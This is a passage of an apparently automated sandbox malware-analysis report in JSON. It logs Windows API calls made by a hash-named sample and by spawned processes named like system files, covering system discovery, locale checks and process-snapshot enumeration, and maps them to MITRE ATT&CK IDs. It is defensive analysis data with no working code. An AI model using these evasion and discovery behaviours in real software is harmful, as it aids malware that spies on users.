\"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005452)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005364)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005364)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005364)\n \"SERVICES.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00003360)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000088b1650068da1200b344be6b81d050760000000000000000000000000000000000000000000000002c010000000000000000000000000000ef8ffc39067dfb3924df12005ecb4e762c01000000000000005d4c7680e112000e5d4c7618dd1200dcaa5076010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008390fc39f8da12006d821d761487660004010000 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000300030003000610064006300360038006500340032003400340036003100620063003100330003000000000000000200000058d66600604c6400286d62003200020001000000f40100000a0000000000000000000000684c6400c201000009000000f071620005000000000000003200000038de6600a0c51200cc41bc7758d6660028000000fc000000ff2bbb7717ecf377d8eb1477ac0162000000620031000700010000000000ffff95010000040000000100000032000200010000000300000001000000000000000000000038706200f8070000200000000000000000000000 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000670001000000ffffffff0200000008000000a8d46600a8d46600a3d466000000000002000000b88f640000000000010000080000000068ec120095e1b7779f3b5a00feffffffe0d912003f08d17702000000b88f6400000000000100001888fbd077d0d91200c81c5076a6db120095fbd07704db1200b88f64000000000000000000000000008cda1200000062007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007790fc394cda12006d821d761487660004010000 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001f99fc3964d312006d821d76b45a670004010000 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000c82d6900b8cf1200b344be6b81d05076000000000000000000000000000000000000000000000000780100000000000000000000000000003f9afc397668fb3974d412005ecb4e767801000000000000005d4c76d0d612000e5d4c7668d21200dcaa507601000000000000007a000000fffffffffffffffff0cf1200780200000000000025000000f0cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600739afc3948d012006d821d767c60670004010000 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006700c0250000000062000000000490626700accf12000464bb7738016200e063bb7702000000b88f640000000000010000089f3b5a00feffffffbcc7c377c0c7c3770a00000030cf12003f08d17702000000b88f6400000000000100001888fbd07720cf1200c81c5076f6d0120095fbd07754d01200b88f6400000000000000000000000000dccf1200000062007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036002785fc399ccf12006d821d767c60670004010000 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000883a6500833a650000000000000000000000620000000001e4cb12000000000048d9120095e1b7779f3b5a00feffffff435cbb775059bb77aa000000b8000000823a6500803a65006ccd1200a4d1120000000000000000000000000000000000000000000000000000000000000000001c5cba7760d8c775ffffffff170000001ccd120024000000030000000cd2120038d71200a4d112008600000048cd120096edbb77aa3a6500a06a9175860000006ccd1200a4d112000000000086008800a06a91756ccd1200916c9175aa3a6500a06a9175a06a9175dcd1120002020000 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005080)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005160)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000090fa1b0068da1200b344be6b81d05076000000000000000000000000000000000000000000000000180100000000000000000000000000004560fa39776ffc3924df12005ecb4e761801000000000000005d4c7680e112000e5d4c7618dd1200dcaa5076010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600bf60fa39f8da12006d821d763c781c0004010000 (UID: 00000000-00005160)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005160)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005080)\n \"D3_08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005160)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004880)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005080)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"IsWow64Process\" with parameter \"5080\" - (UID: 00000000-00005080)\n \"D3_08.exe\" called \"IsWow64Process\" with parameter \"5160\" - (UID: 00000000-00005160)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"4880\" - (UID: 00000000-00004880)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"5072\" - (UID: 00000000-00005072)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"4420\" - (UID: 00000000-00004420)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"3360\" - (UID: 00000000-00003360)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"5780\" - (UID: 00000000-00005780)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"4316\" - (UID: 00000000-00004316)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"GetWindowTextA\" (UID: 00000000-00005080)\n \"D3_08.exe\" called \"GetWindowTextA\" (UID: 00000000-00005160)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004880)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004596)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005356)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005072)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005452)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005364)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003360)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005728)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005716)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005560)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005524)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005608)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005532)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004316)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005956)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004192)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004320)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003964)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006104)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005256)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005312)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb147770d666000050fd7f9a5cbc7700f0fd7f60c612004450fd7f00000000400000003f000000200000000050fd7f54c61200c15cbc776082c377200000000050fd7f9a5cbc7700f0fd7f78c612005789bb778083c3771317c875d8eb1477 (UID: 00000000-00005080)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb147720d71c0000f0fd7f9a5cbc7700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15cbc776082c3772000000000f0fd7f9a5cbc7700e0fd7f78c612005789bb778083c3771317c875d8eb1477 (UID: 00000000-00005160)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bd901d01bd9010016d9010000d601e414d90188000000880000001768bb779817d901ff2bbb77cdb9f377a41bd901ac011b0000001b000000d601c06dd6011200a200fb040000c06dd6015016d901100000000000000013009d00fb040000c06dd601 (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb147768d21f0000d0fd7f9a5cbc7700f0fd7f60c6120044d0fd7f00000000400000003f0000002000000000d0fd7f54c61200c15cbc776082c3772000000000d0fd7f9a5cbc7700f0fd7f78c612005789bb778083c3771317c875d8eb1477 (UID: 00000000-00004880)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bc001d01bc0010016c0010000bd01e414c00188000000880000001768bb779817c001ff2bbb772db9f377a41bc001ac016200000062000000bd01c06dbd011000ac0016010000c06dbd015016c00110000000000000001100a70016010000c06dbd01 (UID: 00000000-00004596)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bbc01d01bbc010016bc010000b901e414bc0188000000880000001768bb779817bc01ff2bbb77edb2f377a41bbc01ac011900000019000000b901c06db9011200a20079030000c06db9015016bc01100000000000000013009d0079030000c06db901 (UID: 00000000-00005356)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21b3601d01b36010016360100003301e414360188000000880000001768bb7798173601ff2bbb7763b4f377a41b3601ac011f0000001f0000003301c06d330113009d0062010000c06d33015016360110000000000000001400980062010000c06d3301 (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb147748ab230000f0fd7f9a5cbc7700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15cbc776082c3772000000000f0fd7f9a5cbc7700e0fd7f78c612005789bb778083c3771317c875d8eb1477 (UID: 00000000-00005072)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21be501d01be5010016e5010000e201e414e50188000000880000001768bb779817e501ff2bbb771facf377a41be501ac011b0000001b000000e201c06de2011200a2003c040000c06de2015016e501100000000000000013009d003c040000c06de201 (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb14775894200000f0fd7f9a5cbc7700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15cbc776082c3772000000000f0fd7f9a5cbc7700e0fd7f78c612005789bb778083c3771317c875d8eb1477 (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bb801d01bb8010016b8010000b501e414b80188000000880000001768bb779817b801ff2bbb777ba3f377a41bb801ac011900000019000000b501c06db5011200a2003e040000c06db5015016b801100000000000000013009d003e040000c06db501 (UID: 00000000-00005452)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a00100005a1bd001581bd0018815d0010000cd016c14d00188000000880000001768bb772017d001ff2bbb7718a6f3772c1bd001ac012400000024000000cd01905bcd011000ac00ce040000905bcd01d815d00110000000000000001100a700ce040000905bcd01 (UID: 00000000-00005364)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21b4501d01b45010016450100004201e414450188000000880000001768bb7798174501ff2bbb77a29af377a41b4501ac011b0000001b0000004201c06d4201140098006d010000c06d4201501645011000000000000000150093006d010000c06d4201 (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1477a0951f0000f0fd7f9a5cbc7700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15cbc776082c3772000000000f0fd7f9a5cbc7700e0fd7f78c612005789bb778083c3771317c875d8eb1477 (UID: 00000000-00003360)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a00100005a1bd601581bd6018815d6010000d3016c14d60188000000880000001768bb772017d601ff2bbb77ff9ff3772c1bd601ac011d0000001d000000d301905bd3011000ac00c0010000905bd301d815d60110000000000000001100a700c0010000905bd301 (UID: 00000000-00005752)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bc001d01bc0010016c0010000bd01e414c00188000000880000001768bb779817c001ff2bbb777e96f377a41bc001ac011e0000001e000000bd01c06dbd011200a20090050000c06dbd015016c001100000000000000013009d0090050000c06dbd01 (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bb701d01bb7010016b7010000b401e414b70188000000880000001768bb779817b701ff2bbb772096f377a41bb701ac012d0000002d000000b401c06db4011200a20039040000c06db4015016b701100000000000000013009d0039040000c06db401 (UID: 00000000-00005728)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bd801d01bd8010016d8010000d501e414d80188000000880000001768bb779817d801ff2bbb77c88df377a41bd801ac012600000026000000d501c06dd501140098006f010000c06dd5015016d8011000000000000000150093006f010000c06dd501 (UID: 00000000-00005716)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bd201d01bd2010016d2010000cf01e414d20188000000880000001768bb779817d201ff2bbb77388df377a41bd201ac016200000062000000cf01c06dcf0114009800e1000000c06dcf015016d201100000000000000015009300e1000000c06dcf01 (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1477c8bd660000b0fd7f9a5cbc7700f0fd7f60c6120044b0fd7f00000000400000003f0000002000000000b0fd7f54c61200c15cbc776082c3772000000000b0fd7f9a5cbc7700f0fd7f78c612005789bb778083c3771317c875d8eb1477 (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bd201d01bd2010016d2010000cf01e414d20188000000880000001768bb779817d201ff2bbb776b81f377a41bd201ac011500000015000000cf01c06dcf011400980011000000c06dcf015016d20110000000000000001500930011000000c06dcf01 (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21b3400d01b34000016340000003100e414340088000000880000001768bb7798173400ff2bbb774ed0f477a41b3400ac0121000000210000003100c06d31001200a200fb040000c06d310050163400100000000000000013009d00fb040000c06d3100 (UID: 00000000-00005560)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21b4d01d01b4d0100164d0100004a01e4144d0188000000880000001768bb7798174d01ff2bbb770f87f377a41b4d01ac015f0000005f0000004a01c06d4a0114009800b1020000c06d4a0150164d01100000000000000015009300b1020000c06d4a01 (UID: 00000000-00005524)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a0010000d21bba01d01bba010016ba010000b701e414ba0188000000880000001768bb779817ba01ff2bbb773a84f377a41bba01ac012d0000002d000000b701c06db7011200a20039040000c06db7015016ba01100000000000000013009d0039040000c06db701 (UID: 00000000-00005608)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059bb7798010000a00100005a1bdf01581bdf018815df010000dc016c14df0188000000880000001768bb772017df01ff2bbb773a84f3772c1bdf01ac012b0000002b000000dc01905bdc011000ac00fb040000905bdc01d815df0110000000000000001100a700fb040000905bdc01 (UID: 00000000-00005532)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004880)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004596)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005356)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005452)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005364)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003360)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005728)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005716)\n \"LSASS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005780)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005524)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005608)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"492\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"508\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"516\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"616\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"692\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"780\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"820\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"872\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"904\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1120\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1264\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1304\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1456\"}\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1604\"}\n 